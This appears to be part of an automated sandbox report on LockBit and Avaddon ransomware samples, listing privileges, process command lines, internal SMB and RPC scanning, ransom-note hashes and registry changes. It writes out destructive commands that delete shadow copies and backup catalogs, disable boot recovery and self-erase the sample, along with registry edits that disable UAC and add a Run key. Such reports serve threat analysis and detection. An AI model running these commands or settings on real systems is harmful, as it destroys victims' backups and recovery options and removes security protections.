| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbengine.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit-note.hta"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 10.127.1.229:445 | tcp | |
| N/A | 10.127.1.214:445 | tcp | |
| N/A | 10.127.1.199:445 | tcp | |
| N/A | 10.127.1.237:445 | tcp | |
| N/A | 10.127.1.234:445 | tcp | |
| N/A | 10.127.1.244:445 | tcp | |
| N/A | 10.127.1.193:445 | tcp | |
| N/A | 10.127.1.247:445 | tcp | |
| N/A | 10.127.1.235:445 | tcp | |
| N/A | 10.127.1.206:445 | tcp | |
| N/A | 10.127.1.219:445 | tcp | |
| N/A | 10.127.1.205:445 | tcp | |
| N/A | 10.127.1.212:445 | tcp | |
| N/A | 10.127.1.195:445 | tcp | |
| N/A | 10.127.1.187:445 | tcp | |
| N/A | 10.127.1.192:445 | tcp | |
| N/A | 10.127.1.254:445 | tcp | |
| N/A | 10.127.1.238:445 | tcp | |
| N/A | 10.127.1.190:445 | tcp | |
| N/A | 10.127.1.240:445 | tcp | |
| N/A | 10.127.1.236:445 | tcp | |
| N/A | 10.127.1.221:445 | tcp | |
| N/A | 10.127.1.227:445 | tcp | |
| N/A | 10.127.1.181:445 | tcp | |
| N/A | 10.127.1.250:445 | tcp | |
| N/A | 10.127.1.211:445 | tcp | |
| N/A | 10.127.1.196:445 | tcp | |
| N/A | 10.127.1.220:445 | tcp | |
| N/A | 10.127.1.53:445 | tcp | |
| N/A | 10.127.1.245:445 | tcp | |
| N/A | 10.127.1.230:445 | tcp | |
| N/A | 10.127.1.202:445 | tcp | |
| N/A | 10.127.1.225:445 | tcp | |
| N/A | 10.127.1.204:445 | tcp | |
| N/A | 10.127.1.228:445 | tcp | |
| N/A | 10.127.1.222:445 | tcp | |
| N/A | 10.127.1.183:445 | tcp | |
| N/A | 10.127.1.246:445 | tcp | |
| N/A | 10.127.1.210:445 | tcp | |
| N/A | 10.127.1.243:445 | tcp | |
| N/A | 10.127.1.216:445 | tcp | |
| N/A | 10.127.1.201:445 | tcp | |
| N/A | 10.127.1.191:445 | tcp | |
| N/A | 10.127.1.197:445 | tcp | |
| N/A | 10.127.1.200:445 | tcp | |
| N/A | 10.127.1.24:445 | tcp | |
| N/A | 10.127.1.242:445 | tcp | |
| N/A | 10.127.1.252:445 | tcp | |
| N/A | 10.127.1.198:445 | tcp | |
| N/A | 10.127.1.194:445 | tcp | |
| N/A | 10.127.1.251:445 | tcp | |
| N/A | 10.127.1.241:445 | tcp | |
| N/A | 10.127.1.239:445 | tcp | |
| N/A | 10.127.1.217:445 | tcp | |
| N/A | 10.127.1.77:445 | tcp | |
| N/A | 10.127.1.231:445 | tcp | |
| N/A | 10.127.1.188:445 | tcp | |
| N/A | 10.127.1.223:445 | tcp | |
| N/A | 10.127.1.226:445 | tcp | |
| N/A | 10.127.1.189:445 | tcp | |
| N/A | 10.127.1.135:445 | tcp | |
| N/A | 10.127.1.249:445 | tcp | |
| N/A | 10.127.1.233:445 | tcp | |
| N/A | 10.127.1.208:445 | tcp | |
| N/A | 10.127.1.232:445 | tcp | |
| N/A | 10.127.1.182:445 | tcp | |
| N/A | 10.127.1.253:445 | tcp | |
| N/A | 10.127.1.209:445 | tcp | |
| N/A | 10.127.1.218:445 | tcp | |
| N/A | 10.127.1.207:445 | tcp | |
| N/A | 10.127.1.248:445 | tcp | |
| N/A | 10.127.1.224:445 | tcp | |
| N/A | 10.127.1.213:445 | tcp | |
| N/A | 10.127.1.142:445 | tcp | |
| N/A | 10.127.1.185:445 | tcp | |
| N/A | 10.127.1.215:445 | tcp | |
| N/A | 10.127.1.203:445 | tcp | |
| N/A | 10.127.1.164:445 | tcp | |
| N/A | 10.127.1.152:445 | tcp | |
| N/A | 10.127.1.146:445 | tcp | |
| N/A | 10.127.1.138:445 | tcp | |
| N/A | 10.127.1.136:445 | tcp | |
| N/A | 10.127.1.61:445 | tcp | |
| N/A | 10.127.1.149:445 | tcp | |
| N/A | 10.127.1.154:445 | tcp | |
| N/A | 10.127.1.174:445 | tcp | |
| N/A | 10.127.1.180:445 | tcp | |
| N/A | 10.127.1.171:445 | tcp | |
| N/A | 10.127.1.132:445 | tcp | |
| N/A | 10.127.1.184:445 | tcp | |
| N/A | 10.127.1.173:445 | tcp | |
| N/A | 10.127.1.169:445 | tcp | |
| N/A | 10.127.1.163:445 | tcp | |
| N/A | 10.127.1.2:445 | tcp | |
| N/A | 10.127.1.167:445 | tcp | |
| N/A | 10.127.1.160:445 | tcp | |
| N/A | 10.127.1.145:445 | tcp | |
| N/A | 10.127.1.141:445 | tcp | |
| N/A | 10.127.1.161:445 | tcp | |
| N/A | 10.127.1.134:445 | tcp | |
| N/A | 10.127.1.156:445 | tcp | |
| N/A | 10.127.1.151:445 | tcp | |
| N/A | 10.127.1.131:445 | tcp | |
| N/A | 10.127.1.178:445 | tcp | |
| N/A | 10.127.1.175:445 | tcp | |
| N/A | 10.127.1.143:445 | tcp | |
| N/A | 10.127.1.168:445 | tcp | |
| N/A | 10.127.1.147:445 | tcp | |
| N/A | 10.127.1.155:445 | tcp | |
| N/A | 10.127.1.148:445 | tcp | |
| N/A | 10.127.1.158:445 | tcp | |
| N/A | 10.127.1.159:445 | tcp | |
| N/A | 10.127.1.157:445 | tcp | |
| N/A | 10.127.1.144:445 | tcp | |
| N/A | 10.127.1.130:445 | tcp | |
| N/A | 10.127.1.176:445 | tcp | |
| N/A | 10.127.1.162:445 | tcp | |
| N/A | 10.127.1.153:445 | tcp | |
| N/A | 10.127.1.186:445 | tcp | |
| N/A | 10.127.1.179:445 | tcp | |
| N/A | 10.127.1.166:445 | tcp | |
| N/A | 10.127.1.137:445 | tcp | |
| N/A | 10.127.1.177:445 | tcp | |
| N/A | 10.127.1.139:445 | tcp | |
| N/A | 10.127.1.165:445 | tcp | |
| N/A | 10.127.1.170:445 | tcp | |
| N/A | 10.127.1.133:445 | tcp | |
| N/A | 10.127.1.150:445 | tcp | |
| N/A | 10.127.1.140:445 | tcp | |
| N/A | 10.127.1.172:445 | tcp | |
| N/A | 10.127.1.84:445 | tcp | |
| N/A | 10.127.1.81:445 | tcp | |
| N/A | 10.127.1.94:445 | tcp | |
| N/A | 10.127.1.98:445 | tcp | |
| N/A | 10.127.1.72:445 | tcp | |
| N/A | 10.127.1.69:445 | tcp | |
| N/A | 10.127.1.112:445 | tcp | |
| N/A | 10.127.1.110:445 | tcp | |
| N/A | 10.127.1.79:445 | tcp | |
| N/A | 10.127.1.92:445 | tcp | |
| N/A | 10.127.1.111:445 | tcp | |
| N/A | 10.127.1.67:445 | tcp | |
| N/A | 10.127.1.76:445 | tcp | |
| N/A | 10.127.1.104:445 | tcp | |
| N/A | 10.127.1.78:445 | tcp | |
| N/A | 10.127.1.123:445 | tcp | |
| N/A | 10.127.1.88:445 | tcp | |
| N/A | 10.127.1.89:445 | tcp | |
| N/A | 10.127.1.119:445 | tcp | |
| N/A | 10.127.1.102:445 | tcp | |
| N/A | 10.127.1.125:445 | tcp | |
| N/A | 10.127.1.114:445 | tcp | |
| N/A | 10.127.1.66:445 | tcp | |
| N/A | 10.127.1.65:445 | tcp | |
| N/A | 10.127.1.93:445 | tcp | |
| N/A | 10.127.1.106:445 | tcp | |
| N/A | 10.127.1.99:445 | tcp | |
| N/A | 10.127.1.129:445 | tcp | |
| N/A | 10.127.1.124:445 | tcp | |
| N/A | 10.127.1.122:445 | tcp | |
| N/A | 10.127.1.117:445 | tcp | |
| N/A | 10.127.1.101:445 | tcp | |
| N/A | 10.127.1.108:445 | tcp | |
| N/A | 10.127.1.64:445 | tcp | |
| N/A | 10.127.1.90:445 | tcp | |
| N/A | 10.127.1.68:445 | tcp | |
| N/A | 10.127.1.126:445 | tcp | |
| N/A | 10.127.1.91:445 | tcp | |
| N/A | 10.127.1.97:445 | tcp | |
| N/A | 10.127.1.82:445 | tcp | |
| N/A | 10.127.1.115:445 | tcp | |
| N/A | 10.127.1.75:445 | tcp | |
| N/A | 10.127.1.73:445 | tcp | |
| N/A | 10.127.1.71:445 | tcp | |
| N/A | 10.127.1.128:445 | tcp | |
| N/A | 10.127.1.121:445 | tcp | |
| N/A | 10.127.1.80:445 | tcp | |
| N/A | 10.127.1.100:445 | tcp | |
| N/A | 10.127.1.118:445 | tcp | |
| N/A | 10.127.1.74:445 | tcp | |
| N/A | 10.127.1.103:445 | tcp | |
| N/A | 10.127.1.85:445 | tcp | |
| N/A | 10.127.1.83:445 | tcp | |
| N/A | 10.127.1.127:445 | tcp | |
| N/A | 10.127.1.107:445 | tcp | |
| N/A | 10.127.1.70:445 | tcp | |
| N/A | 10.127.1.86:445 | tcp | |
| N/A | 10.127.1.120:445 | tcp | |
| N/A | 10.127.1.113:445 | tcp | |
| N/A | 10.127.1.105:445 | tcp | |
| N/A | 10.127.1.95:445 | tcp | |
| N/A | 10.127.1.116:445 | tcp | |
| N/A | 10.127.1.109:445 | tcp | |
| N/A | 10.127.1.96:445 | tcp | |
| N/A | 10.127.1.87:445 | tcp | |
| N/A | 10.127.1.47:445 | tcp | |
| N/A | 10.127.1.49:445 | tcp | |
| N/A | 10.127.1.59:445 | tcp | |
| N/A | 10.127.1.46:445 | tcp | |
| N/A | 10.127.1.63:445 | tcp | |
| N/A | 10.127.1.56:445 | tcp | |
| N/A | 10.127.1.45:445 | tcp | |
| N/A | 10.127.1.57:445 | tcp | |
| N/A | 10.127.1.60:445 | tcp | |
| N/A | 10.127.1.5:445 | tcp | |
| N/A | 10.127.1.33:445 | tcp | |
| N/A | 10.127.1.0:445 | tcp | |
| N/A | 10.127.1.31:445 | tcp | |
| N/A | 10.127.1.10:445 | tcp | |
| N/A | 10.127.1.54:445 | tcp | |
| N/A | 10.127.1.15:445 | tcp | |
| N/A | 10.127.1.32:445 | tcp | |
| N/A | 10.127.1.17:445 | tcp | |
| N/A | 10.127.1.34:445 | tcp | |
| N/A | 10.127.1.43:445 | tcp | |
| N/A | 10.127.1.18:445 | tcp | |
| N/A | 10.127.1.62:445 | tcp | |
| N/A | 10.127.1.26:445 | tcp | |
| N/A | 10.127.1.30:445 | tcp | |
| N/A | 10.127.1.48:445 | tcp | |
| N/A | 10.127.1.55:445 | tcp | |
| N/A | 10.127.1.52:445 | tcp | |
| N/A | 10.127.1.23:445 | tcp | |
| N/A | 10.127.1.51:445 | tcp | |
| N/A | 10.127.1.39:445 | tcp | |
| N/A | 10.127.1.44:445 | tcp | |
| N/A | 10.127.1.38:445 | tcp | |
| N/A | 10.127.1.16:445 | tcp | |
| N/A | 10.127.1.36:445 | tcp | |
| N/A | 10.127.1.13:445 | tcp | |
| N/A | 10.127.1.28:445 | tcp | |
| N/A | 10.127.1.22:445 | tcp | |
| N/A | 10.127.1.12:445 | tcp | |
| N/A | 10.127.1.7:445 | tcp | |
| N/A | 10.127.1.4:445 | tcp | |
| N/A | 10.127.1.25:445 | tcp | |
| N/A | 10.127.1.27:445 | tcp | |
| N/A | 10.127.1.40:445 | tcp | |
| N/A | 10.127.1.9:445 | tcp | |
| N/A | 10.127.1.58:445 | tcp | |
| N/A | 10.127.1.11:445 | tcp | |
| N/A | 10.127.1.50:445 | tcp | |
| N/A | 10.127.1.41:445 | tcp | |
| N/A | 10.127.1.21:445 | tcp | |
| N/A | 10.127.1.19:445 | tcp | |
| N/A | 10.127.1.20:445 | tcp | |
| N/A | 10.127.1.37:445 | tcp | |
| N/A | 10.127.1.42:445 | tcp | |
| N/A | 10.127.1.6:445 | tcp | |
| N/A | 10.127.1.1:445 | tcp | |
| N/A | 10.127.1.29:445 | tcp | |
| N/A | 10.127.1.14:445 | tcp | |
| N/A | 10.127.1.35:445 | tcp | |
| N/A | 10.127.1.8:445 | tcp | |
| N/A | 10.127.1.254:135 | tcp | |
| N/A | 10.127.1.243:135 | tcp | |
| N/A | 10.127.1.234:135 | tcp | |
| N/A | 10.127.1.235:135 | tcp | |
| N/A | 10.127.1.237:135 | tcp | |
| N/A | 10.127.1.236:135 | tcp | |
| N/A | 10.127.1.240:135 | tcp | |
| N/A | 10.127.1.238:135 | tcp | |
| N/A | 10.127.1.241:135 | tcp | |
| N/A | 10.127.1.239:135 | tcp | |
| N/A | 10.127.1.229:135 | tcp | |
| N/A | 10.127.1.230:135 | tcp | |
| N/A | 10.127.1.231:135 | tcp | |
| N/A | 10.127.1.232:135 | tcp | |
| N/A | 10.127.1.233:135 | tcp | |
| N/A | 10.127.1.245:135 | tcp | |
| N/A | 10.127.1.246:135 | tcp | |
| N/A | 10.127.1.253:135 | tcp | |
| N/A | 10.127.1.244:135 | tcp | |
| N/A | 10.127.1.247:135 | tcp | |
| N/A | 10.127.1.242:135 | tcp | |
| N/A | 10.127.1.249:135 | tcp | |
| N/A | 10.127.1.250:135 | tcp | |
| N/A | 10.127.1.251:135 | tcp | |
| N/A | 10.127.1.248:135 | tcp | |
| N/A | 10.127.1.252:135 | tcp | |
| N/A | 10.127.1.199:135 | tcp | |
| N/A | 10.127.1.210:135 | tcp | |
| N/A | 10.127.1.211:135 | tcp | |
| N/A | 10.127.1.200:135 | tcp | |
| N/A | 10.127.1.212:135 | tcp | |
| N/A | 10.127.1.213:135 | tcp | |
| N/A | 10.127.1.214:135 | tcp | |
| N/A | 10.127.1.215:135 | tcp | |
| N/A | 10.127.1.216:135 | tcp | |
| N/A | 10.127.1.217:135 | tcp | |
| N/A | 10.127.1.218:135 | tcp | |
| N/A | 10.127.1.219:135 | tcp | |
| N/A | 10.127.1.201:135 | tcp | |
| N/A | 10.127.1.202:135 | tcp | |
| N/A | 10.127.1.203:135 | tcp | |
| N/A | 10.127.1.204:135 | tcp | |
| N/A | 10.127.1.205:135 | tcp | |
| N/A | 10.127.1.209:135 | tcp | |
| N/A | 10.127.1.227:135 | tcp | |
| N/A | 10.127.1.228:135 | tcp | |
| N/A | 10.127.1.220:135 | tcp | |
| N/A | 10.127.1.221:135 | tcp | |
| N/A | 10.127.1.222:135 | tcp | |
| N/A | 10.127.1.223:135 | tcp | |
| N/A | 10.127.1.224:135 | tcp | |
| N/A | 10.127.1.225:135 | tcp | |
| N/A | 10.127.1.206:135 | tcp | |
| N/A | 10.127.1.188:135 | tcp | |
| N/A | 10.127.1.189:135 | tcp | |
| N/A | 10.127.1.193:135 | tcp | |
| N/A | 10.127.1.194:135 | tcp | |
| N/A | 10.127.1.195:135 | tcp | |
| N/A | 10.127.1.196:135 | tcp | |
| N/A | 10.127.1.197:135 | tcp | |
| N/A | 10.127.1.198:135 | tcp | |
| N/A | 10.127.1.184:135 | tcp | |
| N/A | 10.127.1.190:135 | tcp | |
| N/A | 10.127.1.186:135 | tcp | |
| N/A | 10.127.1.191:135 | tcp | |
| N/A | 10.127.1.192:135 | tcp | |
| N/A | 10.127.1.207:135 | tcp | |
| N/A | 10.127.1.208:135 | tcp | |
| N/A | 10.127.1.182:135 | tcp | |
| N/A | 10.127.1.226:135 | tcp | |
| N/A | 10.127.1.185:135 | tcp | |
| N/A | 10.127.1.187:135 | tcp | |
| N/A | 10.127.1.181:135 | tcp | |
| N/A | 10.127.1.183:135 | tcp | |
| N/A | 10.127.1.180:135 | tcp | |
| N/A | 10.127.1.179:135 | tcp | |
| N/A | 10.127.1.177:135 | tcp | |
| N/A | 10.127.1.172:135 | tcp | |
| N/A | 10.127.1.178:135 | tcp | |
| N/A | 10.127.1.171:135 | tcp | |
| N/A | 10.127.1.176:135 | tcp | |
| N/A | 10.127.1.175:135 | tcp | |
| N/A | 10.127.1.174:135 | tcp | |
| N/A | 10.127.1.173:135 | tcp | |
| N/A | 10.127.1.168:135 | tcp | |
| N/A | 10.127.1.170:135 | tcp | |
| N/A | 10.127.1.169:135 | tcp | |
| N/A | 10.127.1.166:135 | tcp | |
| N/A | 10.127.1.165:135 | tcp | |
| N/A | 10.127.1.164:135 | tcp | |
| N/A | 10.127.1.163:135 | tcp | |
| N/A | 10.127.1.162:135 | tcp | |
| N/A | 10.127.1.167:135 | tcp | |
| N/A | 10.127.1.161:135 | tcp | |
| N/A | 10.127.1.160:135 | tcp | |
| N/A | 10.127.1.159:135 | tcp | |
| N/A | 10.127.1.158:135 | tcp | |
| N/A | 10.127.1.157:135 | tcp | |
| N/A | 10.127.1.156:135 | tcp | |
| N/A | 10.127.1.155:135 | tcp | |
| N/A | 10.127.1.154:135 | tcp | |
| N/A | 10.127.1.143:135 | tcp | |
| N/A | 10.127.1.142:135 | tcp | |
| N/A | 10.127.1.141:135 | tcp | |
| N/A | 10.127.1.140:135 | tcp | |
| N/A | 10.127.1.139:135 | tcp | |
| N/A | 10.127.1.137:135 | tcp | |
| N/A | 10.127.1.118:135 | tcp | |
| N/A | 10.127.1.153:135 | tcp | |
| N/A | 10.127.1.123:135 | tcp | |
| N/A | 10.127.1.124:135 | tcp | |
| N/A | 10.127.1.125:135 | tcp | |
| N/A | 10.127.1.126:135 | tcp | |
| N/A | 10.127.1.151:135 | tcp | |
| N/A | 10.127.1.150:135 | tcp | |
| N/A | 10.127.1.149:135 | tcp | |
| N/A | 10.127.1.148:135 | tcp | |
| N/A | 10.127.1.147:135 | tcp | |
| N/A | 10.127.1.146:135 | tcp | |
| N/A | 10.127.1.145:135 | tcp | |
| N/A | 10.127.1.144:135 | tcp | |
| N/A | 10.127.1.138:135 | tcp | |
| N/A | 10.127.1.152:135 | tcp | |
| N/A | 10.127.1.136:135 | tcp | |
| N/A | 10.127.1.135:135 | tcp | |
| N/A | 10.127.1.134:135 | tcp | |
| N/A | 10.127.1.133:135 | tcp | |
| N/A | 10.127.1.132:135 | tcp | |
| N/A | 10.127.1.131:135 | tcp | |
| N/A | 10.127.1.130:135 | tcp | |
| N/A | 10.127.1.129:135 | tcp | |
| N/A | 10.127.1.128:135 | tcp | |
| N/A | 10.127.1.119:135 | tcp | |
| N/A | 10.127.1.120:135 | tcp | |
| N/A | 10.127.1.121:135 | tcp | |
| N/A | 10.127.1.127:135 | tcp | |
| N/A | 10.127.1.105:135 | tcp | |
| N/A | 10.127.1.108:135 | tcp | |
| N/A | 10.127.1.112:135 | tcp | |
| N/A | 10.127.1.113:135 | tcp | |
| N/A | 10.127.1.114:135 | tcp | |
| N/A | 10.127.1.116:135 | tcp | |
| N/A | 10.127.1.106:135 | tcp | |
| N/A | 10.127.1.109:135 | tcp | |
| N/A | 10.127.1.110:135 | tcp | |
| N/A | 10.127.1.111:135 | tcp | |
| N/A | 10.127.1.115:135 | tcp | |
| N/A | 10.127.1.117:135 | tcp | |
| N/A | 10.127.1.122:135 | tcp | |
| N/A | 10.127.1.107:135 | tcp | |
| N/A | 10.127.1.86:135 | tcp | |
| N/A | 10.127.1.90:135 | tcp | |
| N/A | 10.127.1.91:135 | tcp | |
| N/A | 10.127.1.92:135 | tcp | |
| N/A | 10.127.1.93:135 | tcp | |
| N/A | 10.127.1.94:135 | tcp | |
| N/A | 10.127.1.87:135 | tcp | |
| N/A | 10.127.1.88:135 | tcp | |
| N/A | 10.127.1.89:135 | tcp | |
| N/A | 10.127.1.95:135 | tcp | |
| N/A | 10.127.1.96:135 | tcp | |
| N/A | 10.127.1.98:135 | tcp | |
| N/A | 10.127.1.101:135 | tcp | |
| N/A | 10.127.1.102:135 | tcp | |
| N/A | 10.127.1.104:135 | tcp | |
| N/A | 10.127.1.97:135 | tcp | |
| N/A | 10.127.1.99:135 | tcp | |
| N/A | 10.127.1.100:135 | tcp | |
| N/A | 10.127.1.103:135 | tcp | |
| N/A | 10.127.1.72:135 | tcp | |
| N/A | 10.127.1.73:135 | tcp | |
| N/A | 10.127.1.74:135 | tcp | |
| N/A | 10.127.1.75:135 | tcp | |
| N/A | 10.127.1.76:135 | tcp | |
| N/A | 10.127.1.81:135 | tcp | |
| N/A | 10.127.1.82:135 | tcp | |
| N/A | 10.127.1.83:135 | tcp | |
| N/A | 10.127.1.84:135 | tcp | |
| N/A | 10.127.1.85:135 | tcp | |
| N/A | 10.127.1.77:135 | tcp | |
| N/A | 10.127.1.78:135 | tcp | |
| N/A | 10.127.1.79:135 | tcp | |
| N/A | 10.127.1.80:135 | tcp | |
| N/A | 10.127.1.61:135 | tcp | |
| N/A | 10.127.1.64:135 | tcp | |
| N/A | 10.127.1.65:135 | tcp | |
| N/A | 10.127.1.66:135 | tcp | |
| N/A | 10.127.1.67:135 | tcp | |
| N/A | 10.127.1.68:135 | tcp | |
| N/A | 10.127.1.69:135 | tcp | |
| N/A | 10.127.1.70:135 | tcp | |
| N/A | 10.127.1.71:135 | tcp | |
| N/A | 10.127.1.60:135 | tcp | |
| N/A | 10.127.1.62:135 | tcp | |
| N/A | 10.127.1.63:135 | tcp | |
| N/A | 10.127.1.45:135 | tcp | |
| N/A | 10.127.1.49:135 | tcp | |
| N/A | 10.127.1.50:135 | tcp | |
| N/A | 10.127.1.51:135 | tcp | |
| N/A | 10.127.1.52:135 | tcp | |
| N/A | 10.127.1.55:135 | tcp | |
| N/A | 10.127.1.56:135 | tcp | |
| N/A | 10.127.1.59:135 | tcp | |
| N/A | 10.127.1.46:135 | tcp | |
| N/A | 10.127.1.47:135 | tcp | |
| N/A | 10.127.1.48:135 | tcp | |
| N/A | 10.127.1.53:135 | tcp | |
| N/A | 10.127.1.54:135 | tcp | |
| N/A | 10.127.1.57:135 | tcp | |
| N/A | 10.127.1.58:135 | tcp | |
| N/A | 10.127.1.34:135 | tcp | |
| N/A | 10.127.1.40:135 | tcp | |
| N/A | 10.127.1.41:135 | tcp | |
| N/A | 10.127.1.42:135 | tcp | |
| N/A | 10.127.1.43:135 | tcp | |
| N/A | 10.127.1.44:135 | tcp | |
| N/A | 10.127.1.33:135 | tcp | |
| N/A | 10.127.1.35:135 | tcp | |
| N/A | 10.127.1.36:135 | tcp | |
| N/A | 10.127.1.26:135 | tcp | |
| N/A | 10.127.1.30:135 | tcp | |
| N/A | 10.127.1.31:135 | tcp | |
| N/A | 10.127.1.32:135 | tcp | |
| N/A | 10.127.1.37:135 | tcp | |
| N/A | 10.127.1.38:135 | tcp | |
| N/A | 10.127.1.39:135 | tcp | |
| N/A | 10.127.1.25:135 | tcp | |
| N/A | 10.127.1.27:135 | tcp | |
| N/A | 10.127.1.28:135 | tcp | |
| N/A | 10.127.1.29:135 | tcp | |
| N/A | 10.127.1.6:135 | tcp | |
| N/A | 10.127.1.7:135 | tcp | |
| N/A | 10.127.1.8:135 | tcp | |
| N/A | 10.127.1.9:135 | tcp | |
| N/A | 10.127.1.10:135 | tcp | |
| N/A | 10.127.1.11:135 | tcp | |
| N/A | 10.127.1.18:135 | tcp | |
| N/A | 10.127.1.19:135 | tcp | |
| N/A | 10.127.1.20:135 | tcp | |
| N/A | 10.127.1.22:135 | tcp | |
| N/A | 10.127.1.23:135 | tcp | |
| N/A | 10.127.1.24:135 | tcp | |
| N/A | 10.127.1.2:135 | tcp | |
| N/A | 10.127.1.4:135 | tcp | |
| N/A | 10.127.1.5:135 | tcp | |
| N/A | 10.127.1.12:135 | tcp | |
| N/A | 10.127.1.13:135 | tcp | |
| N/A | 10.127.1.14:135 | tcp | |
| N/A | 10.127.1.15:135 | tcp | |
| N/A | 10.127.1.1:135 | tcp | |
| N/A | 10.127.1.16:135 | tcp | |
| N/A | 10.127.1.17:135 | tcp | |
| N/A | 10.127.1.21:135 | tcp | |
| N/A | 10.127.1.0:135 | tcp |
Files
C:\Program Files\DVD Maker\de-DE\Restore-My-Files.txt
| MD5 | f1f9fa7e0ac011f93ea508f6c0c595ef |
| SHA1 | 933ec77d7416e7cbb2d3e30a2250da2259112679 |
| SHA256 | 54bb61b3fa4c51f7a518089987984e77ca4eb2ab4776fa458cb986dff1ddf816 |
| SHA512 | b96b3c5eb97484762a0cb52193ffb900d336edda4034bd57480f9f6e1b38bd2455eef9d058b24ca4b6da10df6b83c1fba549235428614f72df23532a28774fc7 |
C:\Users\Admin\Desktop\LockBit-note.hta
| MD5 | 83b62f624992a5ac6afb087554d25c31 |
| SHA1 | 5bf1c39eb8208e2a48dc6d9fc6f8f6f270e2bcde |
| SHA256 | 1e5f657e4ee5ec3beb3ffe32e4a514194e5617da74aec07eadd587670cf63a8b |
| SHA512 | 47a56042a5d1468ab8fc7609ff67ef23c5639866922953ec7afa391d384f4d28eaa566638f750bf0810747032bb816ed79bd11e5d40db7db06e941fa7cde8846 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1788s
Max time network
1806s
Command Line
Signatures
Avaddon
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
Renames multiple (158) files with added filename extension
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2480455240-981575606-1030659066-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\update = "C:\\Users\\Admin\\AppData\\Roaming\\Avaddon_09_06_2020_1054KB.exe" | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Avaddon_09_06_2020_1054KB.exe | N/A |
